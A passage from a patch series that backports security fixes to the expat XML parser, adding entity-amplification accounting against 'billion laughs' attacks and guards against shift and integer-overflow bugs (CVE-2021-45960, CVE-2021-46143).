842+ XML_FALSE, XML_ACCOUNT_ENTITY_EXPANSION);
843
844 if (result != XML_ERROR_NONE)
845 return result;
846@@ -5239,6 +5479,9 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
847 entity->processed = (int)(next - (char *)entity->textPtr);
848 return result;
849 } else {
850+#ifdef XML_DTD
851+ entityTrackingOnClose(parser, entity, __LINE__);
852+#endif
853 entity->open = XML_FALSE;
854 parser->m_openInternalEntities = openEntity->next;
855 /* put openEntity back in list of free instances */
856@@ -5252,7 +5495,8 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
857 parser->m_processor = prologProcessor;
858 tok = XmlPrologTok(parser->m_encoding, s, end, &next);
859 return doProlog(parser, parser->m_encoding, s, end, tok, next, nextPtr,
860- (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE);
861+ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE,
862+ XML_ACCOUNT_DIRECT);
863 } else
864 #endif /* XML_DTD */
865 {
866@@ -5260,7 +5504,8 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
867 /* see externalEntityContentProcessor vs contentProcessor */
868 return doContent(parser, parser->m_parentParser ? 1 : 0, parser->m_encoding,
869 s, end, nextPtr,
870- (XML_Bool)! parser->m_parsingStatus.finalBuffer);
871+ (XML_Bool)! parser->m_parsingStatus.finalBuffer,
872+ XML_ACCOUNT_DIRECT);
873 }
874 }
875
876@@ -5275,9 +5520,10 @@ errorProcessor(XML_Parser parser, const char *s, const char *end,
877
878 static enum XML_Error
879 storeAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
880- const char *ptr, const char *end, STRING_POOL *pool) {
881+ const char *ptr, const char *end, STRING_POOL *pool,
882+ enum XML_Account account) {
883 enum XML_Error result
884- = appendAttributeValue(parser, enc, isCdata, ptr, end, pool);
885+ = appendAttributeValue(parser, enc, isCdata, ptr, end, pool, account);
886 if (result)
887 return result;
888 if (! isCdata && poolLength(pool) && poolLastChar(pool) == 0x20)
889@@ -5289,11 +5535,22 @@ storeAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
890
891 static enum XML_Error
892 appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
893- const char *ptr, const char *end, STRING_POOL *pool) {
894+ const char *ptr, const char *end, STRING_POOL *pool,
895+ enum XML_Account account) {
896 DTD *const dtd = parser->m_dtd; /* save one level of indirection */
897+#ifndef XML_DTD
898+ UNUSED_P(account);
899+#endif
900+
901 for (;;) {
902 const char *next;
903 int tok = XmlAttributeValueTok(enc, ptr, end, &next);
904+#ifdef XML_DTD
905+ if (! accountingDiffTolerated(parser, tok, ptr, next, __LINE__, account)) {
906+ accountingOnAbort(parser);
907+ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
908+ }
909+#endif
910 switch (tok) {
911 case XML_TOK_NONE:
912 return XML_ERROR_NONE;
913@@ -5353,6 +5610,14 @@ appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
914 XML_Char ch = (XML_Char)XmlPredefinedEntityName(
915 enc, ptr + enc->minBytesPerChar, next - enc->minBytesPerChar);
916 if (ch) {
917+#ifdef XML_DTD
918+ /* NOTE: We are replacing 4-6 characters original input for 1 character
919+ * so there is no amplification and hence recording without
920+ * protection. */
921+ accountingDiffTolerated(parser, tok, (char *)&ch,
922+ ((char *)&ch) + sizeof(XML_Char), __LINE__,
923+ XML_ACCOUNT_ENTITY_EXPANSION);
924+#endif /* XML_DTD */
925 if (! poolAppendChar(pool, ch))
926 return XML_ERROR_NO_MEMORY;
927 break;
928@@ -5430,9 +5695,16 @@ appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
929 enum XML_Error result;
930 const XML_Char *textEnd = entity->textPtr + entity->textLen;
931 entity->open = XML_TRUE;
932+#ifdef XML_DTD
933+ entityTrackingOnOpen(parser, entity, __LINE__);
934+#endif
935 result = appendAttributeValue(parser, parser->m_internalEncoding,
936- isCdata, (char *)entity->textPtr,
937- (char *)textEnd, pool);
938+ isCdata, (const char *)entity->textPtr,
939+ (const char *)textEnd, pool,
940+ XML_ACCOUNT_ENTITY_EXPANSION);
941+#ifdef XML_DTD
942+ entityTrackingOnClose(parser, entity, __LINE__);
943+#endif
944 entity->open = XML_FALSE;
945 if (result)
946 return result;
947@@ -5462,13 +5734,16 @@ appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
948
949 static enum XML_Error
950 storeEntityValue(XML_Parser parser, const ENCODING *enc,
951- const char *entityTextPtr, const char *entityTextEnd) {
952+ const char *entityTextPtr, const char *entityTextEnd,
953+ enum XML_Account account) {
954 DTD *const dtd = parser->m_dtd; /* save one level of indirection */
955 STRING_POOL *pool = &(dtd->entityValuePool);
956 enum XML_Error result = XML_ERROR_NONE;
957 #ifdef XML_DTD
958 int oldInEntityValue = parser->m_prologState.inEntityValue;
959 parser->m_prologState.inEntityValue = 1;
960+#else
961+ UNUSED_P(account);
962 #endif /* XML_DTD */
963 /* never return Null for the value argument in EntityDeclHandler,
964 since this would indicate an external entity; therefore we
965@@ -5481,6 +5756,16 @@ storeEntityValue(XML_Parser parser, const ENCODING *enc,
966 for (;;) {
967 const char *next;
968 int tok = XmlEntityValueTok(enc, entityTextPtr, entityTextEnd, &next);
969+
970+#ifdef XML_DTD
971+ if (! accountingDiffTolerated(parser, tok, entityTextPtr, next, __LINE__,
972+ account)) {
973+ accountingOnAbort(parser);
974+ result = XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
975+ goto endEntityValue;
976+ }
977+#endif
978+
979 switch (tok) {
980 case XML_TOK_PARAM_ENTITY_REF:
981 #ifdef XML_DTD
982@@ -5516,13 +5801,16 @@ storeEntityValue(XML_Parser parser, const ENCODING *enc,
983 if (parser->m_externalEntityRefHandler) {
984 dtd->paramEntityRead = XML_FALSE;
985 entity->open = XML_TRUE;
986+ entityTrackingOnOpen(parser, entity, __LINE__);
987 if (! parser->m_externalEntityRefHandler(
988 parser->m_externalEntityRefHandlerArg, 0, entity->base,
989 entity->systemId, entity->publicId)) {
990+ entityTrackingOnClose(parser, entity, __LINE__);
991 entity->open = XML_FALSE;
992 result = XML_ERROR_EXTERNAL_ENTITY_HANDLING;
993 goto endEntityValue;
994 }
995+ entityTrackingOnClose(parser, entity, __LINE__);
996 entity->open = XML_FALSE;
997 if (! dtd->paramEntityRead)
998 dtd->keepProcessing = dtd->standalone;
999@@ -5530,9 +5818,12 @@ storeEntityValue(XML_Parser parser, const ENCODING *enc,
1000 dtd->keepProcessing = dtd->standalone;
1001 } else {
1002 entity->open = XML_TRUE;
1003+ entityTrackingOnOpen(parser, entity, __LINE__);
1004 result = storeEntityValue(
1005- parser, parser->m_internalEncoding, (char *)entity->textPtr,
1006- (char *)(entity->textPtr + entity->textLen));
1007+ parser, parser->m_internalEncoding, (const char *)entity->textPtr,
1008+ (const char *)(entity->textPtr + entity->textLen),
1009+ XML_ACCOUNT_ENTITY_EXPANSION);
1010+ entityTrackingOnClose(parser, entity, __LINE__);
1011 entity->open = XML_FALSE;
1012 if (result)
1013 goto endEntityValue;
1014@@ -6893,3 +7184,741 @@ copyString(const XML_Char *s, const XML_Memory_Handling_Suite *memsuite) {
1015 memcpy(result, s, charsRequired * sizeof(XML_Char));
1016 return result;
1017 }
1018+
1019+#ifdef XML_DTD
1020+
1021+static float
1022+accountingGetCurrentAmplification(XML_Parser rootParser) {
1023+ const XmlBigCount countBytesOutput
1024+ = rootParser->m_accounting.countBytesDirect
1025+ + rootParser->m_accounting.countBytesIndirect;
1026+ const float amplificationFactor
1027+ = rootParser->m_accounting.countBytesDirect
1028+ ? (countBytesOutput
1029+ / (float)(rootParser->m_accounting.countBytesDirect))
1030+ : 1.0f;
1031+ assert(! rootParser->m_parentParser);
1032+ return amplificationFactor;
1033+}
1034+
1035+static void
1036+accountingReportStats(XML_Parser originParser, const char *epilog) {
1037+ const XML_Parser rootParser = getRootParserOf(originParser, NULL);
1038+ assert(! rootParser->m_parentParser);
1039+
1040+ if (rootParser->m_accounting.debugLevel < 1) {
1041+ return;
1042+ }
1043+
1044+ const float amplificationFactor
1045+ = accountingGetCurrentAmplification(rootParser);
1046+ fprintf(stderr,
1047+ "expat: Accounting(%p): Direct " EXPAT_FMT_ULL(
1048+ "10") ", indirect " EXPAT_FMT_ULL("10") ", amplification %8.2f%s",
1049+ (void *)rootParser, rootParser->m_accounting.countBytesDirect,
1050+ rootParser->m_accounting.countBytesIndirect,
1051+ (double)amplificationFactor, epilog);
1052+}
1053+
1054+static void
1055+accountingOnAbort(XML_Parser originParser) {
1056+ accountingReportStats(originParser, " ABORTING\n");
1057+}
1058+
1059+static void
1060+accountingReportDiff(XML_Parser rootParser,
1061+ unsigned int levelsAwayFromRootParser, const char *before,
1062+ const char *after, ptrdiff_t bytesMore, int source_line,
1063+ enum XML_Account account) {
1064+ assert(! rootParser->m_parentParser);
1065+
1066+ fprintf(stderr,
1067+ " (+" EXPAT_FMT_PTRDIFF_T("6") " bytes %s|%d, xmlparse.c:%d) %*s\"",
1068+ bytesMore, (account == XML_ACCOUNT_DIRECT) ? "DIR" : "EXP",
1069+ levelsAwayFromRootParser, source_line, 10, "");
1070+
1071+ const char ellipis[] = "[..]";
1072+ const size_t ellipsisLength = sizeof(ellipis) /* because compile-time */ - 1;
1073+ const unsigned int contextLength = 10;
1074+
1075+ /* Note: Performance is of no concern here */
1076+ const char *walker = before;
1077+ if ((rootParser->m_accounting.debugLevel >= 3)
1078+ || (after - before)
1079+ <= (ptrdiff_t)(contextLength + ellipsisLength + contextLength)) {
1080+ for (; walker < after; walker++) {
1081+ fprintf(stderr, "%s", unsignedCharToPrintable(walker[0]));
1082+ }
1083+ } else {
1084+ for (; walker < before + contextLength; walker++) {
1085+ fprintf(stderr, "%s", unsignedCharToPrintable(walker[0]));
1086+ }
1087+ fprintf(stderr, ellipis);
1088+ walker = after - contextLength;
1089+ for (; walker < after; walker++) {
1090+ fprintf(stderr, "%s", unsignedCharToPrintable(walker[0]));
1091+ }
1092+ }
1093+ fprintf(stderr, "\"\n");
1094+}
1095+
1096+static XML_Bool
1097+accountingDiffTolerated(XML_Parser originParser, int tok, const char *before,
1098+ const char *after, int source_line,
1099+ enum XML_Account account) {
1100+ /* Note: We need to check the token type *first* to be sure that
1101+ * we can even access variable <after>, safely.
1102+ * E.g. for XML_TOK_NONE <after> may hold an invalid pointer. */
1103+ switch (tok) {
1104+ case XML_TOK_INVALID:
1105+ case XML_TOK_PARTIAL:
1106+ case XML_TOK_PARTIAL_CHAR:
1107+ case XML_TOK_NONE:
1108+ return XML_TRUE;
1109+ }
1110+
1111+ if (account == XML_ACCOUNT_NONE)
1112+ return XML_TRUE; /* because these bytes have been accounted for, already */
1113+
1114+ unsigned int levelsAwayFromRootParser;
1115+ const XML_Parser rootParser
1116+ = getRootParserOf(originParser, &levelsAwayFromRootParser);
1117+ assert(! rootParser->m_parentParser);
1118+
1119+ const int isDirect
1120+ = (account == XML_ACCOUNT_DIRECT) && (originParser == rootParser);
1121+ const ptrdiff_t bytesMore = after - before;
1122+
1123+ XmlBigCount *const additionTarget
1124+ = isDirect ? &rootParser->m_accounting.countBytesDirect
1125+ : &rootParser->m_accounting.countBytesIndirect;
1126+
1127+ /* Detect and avoid integer overflow */
1128+ if (*additionTarget > (XmlBigCount)(-1) - (XmlBigCount)bytesMore)
1129+ return XML_FALSE;
1130+ *additionTarget += bytesMore;
1131+
1132+ const XmlBigCount countBytesOutput
1133+ = rootParser->m_accounting.countBytesDirect
1134+ + rootParser->m_accounting.countBytesIndirect;
1135+ const float amplificationFactor
1136+ = accountingGetCurrentAmplification(rootParser);
1137+ const XML_Bool tolerated
1138+ = (countBytesOutput < rootParser->m_accounting.activationThresholdBytes)
1139+ || (amplificationFactor
1140+ <= rootParser->m_accounting.maximumAmplificationFactor);
1141+
1142+ if (rootParser->m_accounting.debugLevel >= 2) {
1143+ accountingReportStats(rootParser, "");
1144+ accountingReportDiff(rootParser, levelsAwayFromRootParser, before, after,
1145+ bytesMore, source_line, account);
1146+ }
1147+
1148+ return tolerated;
1149+}
1150+
1151+static void
1152+entityTrackingReportStats(XML_Parser rootParser, ENTITY *entity,
1153+ const char *action, int sourceLine) {
1154+ assert(! rootParser->m_parentParser);
1155+ if (rootParser->m_entity_stats.debugLevel < 1)
1156+ return;
1157+
1158+# if defined(XML_UNICODE)
1159+ const char *const entityName = "[..]";
1160+# else
1161+ const char *const entityName = entity->name;
1162+# endif
1163+
1164+ fprintf(
1165+ stderr,
1166+ "expat: Entities(%p): Count %9d, depth %2d/%2d %*s%s%s; %s length %d (xmlparse.c:%d)\n",
1167+ (void *)rootParser, rootParser->m_entity_stats.countEverOpened,
1168+ rootParser->m_entity_stats.currentDepth,
1169+ rootParser->m_entity_stats.maximumDepthSeen,
1170+ (rootParser->m_entity_stats.currentDepth - 1) * 2, "",
1171+ entity->is_param ? "%" : "&", entityName, action, entity->textLen,
1172+ sourceLine);
1173+}
1174+
1175+static void
1176+entityTrackingOnOpen(XML_Parser originParser, ENTITY *entity, int sourceLine) {
1177+ const XML_Parser rootParser = getRootParserOf(originParser, NULL);
1178+ assert(! rootParser->m_parentParser);
1179+
1180+ rootParser->m_entity_stats.countEverOpened++;
1181+ rootParser->m_entity_stats.currentDepth++;
1182+ if (rootParser->m_entity_stats.currentDepth
1183+ > rootParser->m_entity_stats.maximumDepthSeen) {
1184+ rootParser->m_entity_stats.maximumDepthSeen++;
1185+ }
1186+
1187+ entityTrackingReportStats(rootParser, entity, "OPEN ", sourceLine);
1188+}
1189+
1190+static void
1191+entityTrackingOnClose(XML_Parser originParser, ENTITY *entity, int sourceLine) {
1192+ const XML_Parser rootParser = getRootParserOf(originParser, NULL);
1193+ assert(! rootParser->m_parentParser);
1194+
1195+ entityTrackingReportStats(rootParser, entity, "CLOSE", sourceLine);
1196+ rootParser->m_entity_stats.currentDepth--;
1197+}
1198+
1199+static XML_Parser
1200+getRootParserOf(XML_Parser parser, unsigned int *outLevelDiff) {
1201+ XML_Parser rootParser = parser;
1202+ unsigned int stepsTakenUpwards = 0;
1203+ while (rootParser->m_parentParser) {
1204+ rootParser = rootParser->m_parentParser;
1205+ stepsTakenUpwards++;
1206+ }
1207+ assert(! rootParser->m_parentParser);
1208+ if (outLevelDiff != NULL) {
1209+ *outLevelDiff = stepsTakenUpwards;
1210+ }
1211+ return rootParser;
1212+}
1213+
1214+static const char *
1215+unsignedCharToPrintable(unsigned char c) {
1216+ switch (c) {
1217+ case 0:
1218+ return "\\0";
1219+ case 1:
1220+ return "\\x1";
1221+ case 2:
1222+ return "\\x2";
1223+ case 3:
1224+ return "\\x3";
1225+ case 4:
1226+ return "\\x4";
1227+ case 5:
1228+ return "\\x5";
1229+ case 6:
1230+ return "\\x6";
1231+ case 7:
1232+ return "\\x7";
1233+ case 8:
1234+ return "\\x8";
1235+ case 9:
1236+ return "\\t";
1237+ case 10:
1238+ return "\\n";
1239+ case 11:
1240+ return "\\xB";
1241+ case 12:
1242+ return "\\xC";
1243+ case 13:
1244+ return "\\r";
1245+ case 14:
1246+ return "\\xE";
1247+ case 15:
1248+ return "\\xF";
1249+ case 16:
1250+ return "\\x10";
1251+ case 17:
1252+ return "\\x11";
1253+ case 18:
1254+ return "\\x12";
1255+ case 19:
1256+ return "\\x13";
1257+ case 20:
1258+ return "\\x14";
1259+ case 21:
1260+ return "\\x15";
1261+ case 22:
1262+ return "\\x16";
1263+ case 23:
1264+ return "\\x17";
1265+ case 24:
1266+ return "\\x18";
1267+ case 25:
1268+ return "\\x19";
1269+ case 26:
1270+ return "\\x1A";
1271+ case 27:
1272+ return "\\x1B";
1273+ case 28:
1274+ return "\\x1C";
1275+ case 29:
1276+ return "\\x1D";
1277+ case 30:
1278+ return "\\x1E";
1279+ case 31:
1280+ return "\\x1F";
1281+ case 32:
1282+ return " ";
1283+ case 33:
1284+ return "!";
1285+ case 34:
1286+ return "\\\"";
1287+ case 35:
1288+ return "#";
1289+ case 36:
1290+ return "$";
1291+ case 37:
1292+ return "%";
1293+ case 38:
1294+ return "&";
1295+ case 39:
1296+ return "'";
1297+ case 40:
1298+ return "(";
1299+ case 41:
1300+ return ")";
1301+ case 42:
1302+ return "*";
1303+ case 43:
1304+ return "+";
1305+ case 44:
1306+ return ",";
1307+ case 45:
1308+ return "-";
1309+ case 46:
1310+ return ".";
1311+ case 47:
1312+ return "/";
1313+ case 48:
1314+ return "0";
1315+ case 49:
1316+ return "1";
1317+ case 50:
1318+ return "2";
1319+ case 51:
1320+ return "3";
1321+ case 52:
1322+ return "4";
1323+ case 53:
1324+ return "5";
1325+ case 54:
1326+ return "6";
1327+ case 55:
1328+ return "7";
1329+ case 56:
1330+ return "8";
1331+ case 57:
1332+ return "9";
1333+ case 58:
1334+ return ":";
1335+ case 59:
1336+ return ";";
1337+ case 60:
1338+ return "<";
1339+ case 61:
1340+ return "=";
1341+ case 62:
1342+ return ">";
1343+ case 63:
1344+ return "?";
1345+ case 64:
1346+ return "@";
1347+ case 65:
1348+ return "A";
1349+ case 66:
1350+ return "B";
1351+ case 67:
1352+ return "C";
1353+ case 68:
1354+ return "D";
1355+ case 69:
1356+ return "E";
1357+ case 70:
1358+ return "F";
1359+ case 71:
1360+ return "G";
1361+ case 72:
1362+ return "H";
1363+ case 73:
1364+ return "I";
1365+ case 74:
1366+ return "J";
1367+ case 75:
1368+ return "K";
1369+ case 76:
1370+ return "L";
1371+ case 77:
1372+ return "M";
1373+ case 78:
1374+ return "N";
1375+ case 79:
1376+ return "O";
1377+ case 80:
1378+ return "P";
1379+ case 81:
1380+ return "Q";
1381+ case 82:
1382+ return "R";
1383+ case 83:
1384+ return "S";
1385+ case 84:
1386+ return "T";
1387+ case 85:
1388+ return "U";
1389+ case 86:
1390+ return "V";
1391+ case 87:
1392+ return "W";
1393+ case 88:
1394+ return "X";
1395+ case 89:
1396+ return "Y";
1397+ case 90:
1398+ return "Z";
1399+ case 91:
1400+ return "[";
1401+ case 92:
1402+ return "\\\\";
1403+ case 93:
1404+ return "]";
1405+ case 94:
1406+ return "^";
1407+ case 95:
1408+ return "_";
1409+ case 96:
1410+ return "`";
1411+ case 97:
1412+ return "a";
1413+ case 98:
1414+ return "b";
1415+ case 99:
1416+ return "c";
1417+ case 100:
1418+ return "d";
1419+ case 101:
1420+ return "e";
1421+ case 102:
1422+ return "f";
1423+ case 103:
1424+ return "g";
1425+ case 104:
1426+ return "h";
1427+ case 105:
1428+ return "i";
1429+ case 106:
1430+ return "j";
1431+ case 107:
1432+ return "k";
1433+ case 108:
1434+ return "l";
1435+ case 109:
1436+ return "m";
1437+ case 110:
1438+ return "n";
1439+ case 111:
1440+ return "o";
1441+ case 112:
1442+ return "p";
1443+ case 113:
1444+ return "q";
1445+ case 114:
1446+ return "r";
1447+ case 115:
1448+ return "s";
1449+ case 116:
1450+ return "t";
1451+ case 117:
1452+ return "u";
1453+ case 118:
1454+ return "v";
1455+ case 119:
1456+ return "w";
1457+ case 120:
1458+ return "x";
1459+ case 121:
1460+ return "y";
1461+ case 122:
1462+ return "z";
1463+ case 123:
1464+ return "{";
1465+ case 124:
1466+ return "|";
1467+ case 125:
1468+ return "}";
1469+ case 126:
1470+ return "~";
1471+ case 127:
1472+ return "\\x7F";
1473+ case 128:
1474+ return "\\x80";
1475+ case 129:
1476+ return "\\x81";
1477+ case 130:
1478+ return "\\x82";
1479+ case 131:
1480+ return "\\x83";
1481+ case 132:
1482+ return "\\x84";
1483+ case 133:
1484+ return "\\x85";
1485+ case 134:
1486+ return "\\x86";
1487+ case 135:
1488+ return "\\x87";
1489+ case 136:
1490+ return "\\x88";
1491+ case 137:
1492+ return "\\x89";
1493+ case 138:
1494+ return "\\x8A";
1495+ case 139:
1496+ return "\\x8B";
1497+ case 140:
1498+ return "\\x8C";
1499+ case 141:
1500+ return "\\x8D";
1501+ case 142:
1502+ return "\\x8E";
1503+ case 143:
1504+ return "\\x8F";
1505+ case 144:
1506+ return "\\x90";
1507+ case 145:
1508+ return "\\x91";
1509+ case 146:
1510+ return "\\x92";
1511+ case 147:
1512+ return "\\x93";
1513+ case 148:
1514+ return "\\x94";
1515+ case 149:
1516+ return "\\x95";
1517+ case 150:
1518+ return "\\x96";
1519+ case 151:
1520+ return "\\x97";
1521+ case 152:
1522+ return "\\x98";
1523+ case 153:
1524+ return "\\x99";
1525+ case 154:
1526+ return "\\x9A";
1527+ case 155:
1528+ return "\\x9B";
1529+ case 156:
1530+ return "\\x9C";
1531+ case 157:
1532+ return "\\x9D";
1533+ case 158:
1534+ return "\\x9E";
1535+ case 159:
1536+ return "\\x9F";
1537+ case 160:
1538+ return "\\xA0";
1539+ case 161:
1540+ return "\\xA1";
1541+ case 162:
1542+ return "\\xA2";
1543+ case 163:
1544+ return "\\xA3";
1545+ case 164:
1546+ return "\\xA4";
1547+ case 165:
1548+ return "\\xA5";
1549+ case 166:
1550+ return "\\xA6";
1551+ case 167:
1552+ return "\\xA7";
1553+ case 168:
1554+ return "\\xA8";
1555+ case 169:
1556+ return "\\xA9";
1557+ case 170:
1558+ return "\\xAA";
1559+ case 171:
1560+ return "\\xAB";
1561+ case 172:
1562+ return "\\xAC";
1563+ case 173:
1564+ return "\\xAD";
1565+ case 174:
1566+ return "\\xAE";
1567+ case 175:
1568+ return "\\xAF";
1569+ case 176:
1570+ return "\\xB0";
1571+ case 177:
1572+ return "\\xB1";
1573+ case 178:
1574+ return "\\xB2";
1575+ case 179:
1576+ return "\\xB3";
1577+ case 180:
1578+ return "\\xB4";
1579+ case 181:
1580+ return "\\xB5";
1581+ case 182:
1582+ return "\\xB6";
1583+ case 183:
1584+ return "\\xB7";
1585+ case 184:
1586+ return "\\xB8";
1587+ case 185:
1588+ return "\\xB9";
1589+ case 186:
1590+ return "\\xBA";
1591+ case 187:
1592+ return "\\xBB";
1593+ case 188:
1594+ return "\\xBC";
1595+ case 189:
1596+ return "\\xBD";
1597+ case 190:
1598+ return "\\xBE";
1599+ case 191:
1600+ return "\\xBF";
1601+ case 192:
1602+ return "\\xC0";
1603+ case 193:
1604+ return "\\xC1";
1605+ case 194:
1606+ return "\\xC2";
1607+ case 195:
1608+ return "\\xC3";
1609+ case 196:
1610+ return "\\xC4";
1611+ case 197:
1612+ return "\\xC5";
1613+ case 198:
1614+ return "\\xC6";
1615+ case 199:
1616+ return "\\xC7";
1617+ case 200:
1618+ return "\\xC8";
1619+ case 201:
1620+ return "\\xC9";
1621+ case 202:
1622+ return "\\xCA";
1623+ case 203:
1624+ return "\\xCB";
1625+ case 204:
1626+ return "\\xCC";
1627+ case 205:
1628+ return "\\xCD";
1629+ case 206:
1630+ return "\\xCE";
1631+ case 207:
1632+ return "\\xCF";
1633+ case 208:
1634+ return "\\xD0";
1635+ case 209:
1636+ return "\\xD1";
1637+ case 210:
1638+ return "\\xD2";
1639+ case 211:
1640+ return "\\xD3";
1641+ case 212:
1642+ return "\\xD4";
1643+ case 213:
1644+ return "\\xD5";
1645+ case 214:
1646+ return "\\xD6";
1647+ case 215:
1648+ return "\\xD7";
1649+ case 216:
1650+ return "\\xD8";
1651+ case 217:
1652+ return "\\xD9";
1653+ case 218:
1654+ return "\\xDA";
1655+ case 219:
1656+ return "\\xDB";
1657+ case 220:
1658+ return "\\xDC";
1659+ case 221:
1660+ return "\\xDD";
1661+ case 222:
1662+ return "\\xDE";
1663+ case 223:
1664+ return "\\xDF";
1665+ case 224:
1666+ return "\\xE0";
1667+ case 225:
1668+ return "\\xE1";
1669+ case 226:
1670+ return "\\xE2";
1671+ case 227:
1672+ return "\\xE3";
1673+ case 228:
1674+ return "\\xE4";
1675+ case 229:
1676+ return "\\xE5";
1677+ case 230:
1678+ return "\\xE6";
1679+ case 231:
1680+ return "\\xE7";
1681+ case 232:
1682+ return "\\xE8";
1683+ case 233:
1684+ return "\\xE9";
1685+ case 234:
1686+ return "\\xEA";
1687+ case 235:
1688+ return "\\xEB";
1689+ case 236:
1690+ return "\\xEC";
1691+ case 237:
1692+ return "\\xED";
1693+ case 238:
1694+ return "\\xEE";
1695+ case 239:
1696+ return "\\xEF";
1697+ case 240:
1698+ return "\\xF0";
1699+ case 241:
1700+ return "\\xF1";
1701+ case 242:
1702+ return "\\xF2";
1703+ case 243:
1704+ return "\\xF3";
1705+ case 244:
1706+ return "\\xF4";
1707+ case 245:
1708+ return "\\xF5";
1709+ case 246:
1710+ return "\\xF6";
1711+ case 247:
1712+ return "\\xF7";
1713+ case 248:
1714+ return "\\xF8";
1715+ case 249:
1716+ return "\\xF9";
1717+ case 250:
1718+ return "\\xFA";
1719+ case 251:
1720+ return "\\xFB";
1721+ case 252:
1722+ return "\\xFC";
1723+ case 253:
1724+ return "\\xFD";
1725+ case 254:
1726+ return "\\xFE";
1727+ case 255:
1728+ return "\\xFF";
1729+ default:
1730+ assert(0); /* never gets here */
1731+ return "dead code";
1732+ }
1733+ assert(0); /* never gets here */
1734+}
1735+
1736+#endif /* XML_DTD */
1737+
1738+static unsigned long
1739+getDebugLevel(const char *variableName, unsigned long defaultDebugLevel) {
1740+ const char *const valueOrNull = getenv(variableName);
1741+ if (valueOrNull == NULL) {
1742+ return defaultDebugLevel;
1743+ }
1744+ const char *const value = valueOrNull;
1745+
1746+ errno = 0;
1747+ char *afterValue = (char *)value;
1748+ unsigned long debugLevel = strtoul(value, &afterValue, 10);
1749+ if ((errno != 0) || (afterValue[0] != '\0')) {
1750+ errno = 0;
1751+ return defaultDebugLevel;
1752+ }
1753+
1754+ return debugLevel;
1755+}
1756--
17572.32.0
1758
diff --git a/meta/recipes-core/expat/expat/CVE-2021-45960.patch b/meta/recipes-core/expat/expat/CVE-2021-45960.patch
new file mode 100644
index 0000000000..523449e22c
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2021-45960.patch
@@ -0,0 +1,65 @@
1From 0adcb34c49bee5b19bd29b16a578c510c23597ea Mon Sep 17 00:00:00 2001
2From: Sebastian Pipping <sebastian@pipping.org>
3Date: Mon, 27 Dec 2021 20:15:02 +0100
4Subject: [PATCH] lib: Detect and prevent troublesome left shifts in function
5 storeAtts (CVE-2021-45960)
6
7Upstream-Status: Backport:
8https://github.com/libexpat/libexpat/pull/534/commits/0adcb34c49bee5b19bd29b16a578c510c23597ea
9
10CVE: CVE-2021-45960
11Signed-off-by: Steve Sakoman <steve@sakoman.com>
12
13---
14 expat/lib/xmlparse.c | 31 +++++++++++++++++++++++++++++--
15 1 file changed, 29 insertions(+), 2 deletions(-)
16
17diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
18index d730f41c3..b47c31b05 100644
19--- a/lib/xmlparse.c
20+++ b/lib/xmlparse.c
21@@ -3414,7 +3414,13 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
22 if (nPrefixes) {
23 int j; /* hash table index */
24 unsigned long version = parser->m_nsAttsVersion;
25- int nsAttsSize = (int)1 << parser->m_nsAttsPower;
26+
27+ /* Detect and prevent invalid shift */
28+ if (parser->m_nsAttsPower >= sizeof(unsigned int) * 8 /* bits per byte */) {
29+ return XML_ERROR_NO_MEMORY;
30+ }
31+
32+ unsigned int nsAttsSize = 1u << parser->m_nsAttsPower;
33 unsigned char oldNsAttsPower = parser->m_nsAttsPower;
34 /* size of hash table must be at least 2 * (# of prefixed attributes) */
35 if ((nPrefixes << 1)
36@@ -3425,7 +3431,28 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
37 ;
38 if (parser->m_nsAttsPower < 3)
39 parser->m_nsAttsPower = 3;
40- nsAttsSize = (int)1 << parser->m_nsAttsPower;
41+
42+ /* Detect and prevent invalid shift */
43+ if (parser->m_nsAttsPower >= sizeof(nsAttsSize) * 8 /* bits per byte */) {
44+ /* Restore actual size of memory in m_nsAtts */
45+ parser->m_nsAttsPower = oldNsAttsPower;
46+ return XML_ERROR_NO_MEMORY;
47+ }
48+
49+ nsAttsSize = 1u << parser->m_nsAttsPower;
50+
51+ /* Detect and prevent integer overflow.
52+ * The preprocessor guard addresses the "always false" warning
53+ * from -Wtype-limits on platforms where
54+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
55+#if UINT_MAX >= SIZE_MAX
56+ if (nsAttsSize > (size_t)(-1) / sizeof(NS_ATT)) {
57+ /* Restore actual size of memory in m_nsAtts */
58+ parser->m_nsAttsPower = oldNsAttsPower;
59+ return XML_ERROR_NO_MEMORY;
60+ }
61+#endif
62+
63 temp = (NS_ATT *)REALLOC(parser, parser->m_nsAtts,
64 nsAttsSize * sizeof(NS_ATT));
65 if (! temp) {
diff --git a/meta/recipes-core/expat/expat/CVE-2021-46143.patch b/meta/recipes-core/expat/expat/CVE-2021-46143.patch
new file mode 100644
index 0000000000..b1a726d9a8
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2021-46143.patch
@@ -0,0 +1,49 @@
1From 85ae9a2d7d0e9358f356b33977b842df8ebaec2b Mon Sep 17 00:00:00 2001
2From: Sebastian Pipping <sebastian@pipping.org>
3Date: Sat, 25 Dec 2021 20:52:08 +0100
4Subject: [PATCH] lib: Prevent integer overflow on m_groupSize in function
5 doProlog (CVE-2021-46143)
6
7Upstream-Status: Backport:
8https://github.com/libexpat/libexpat/pull/538/commits/85ae9a2d7d0e9358f356b33977b842df8ebaec2b
9
10CVE: CVE-2021-46143
11
12Signed-off-by: Steve Sakoman <steve@sakoman.com>
13---
14 expat/lib/xmlparse.c | 15 +++++++++++++++
15 1 file changed, 15 insertions(+)
16
17diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
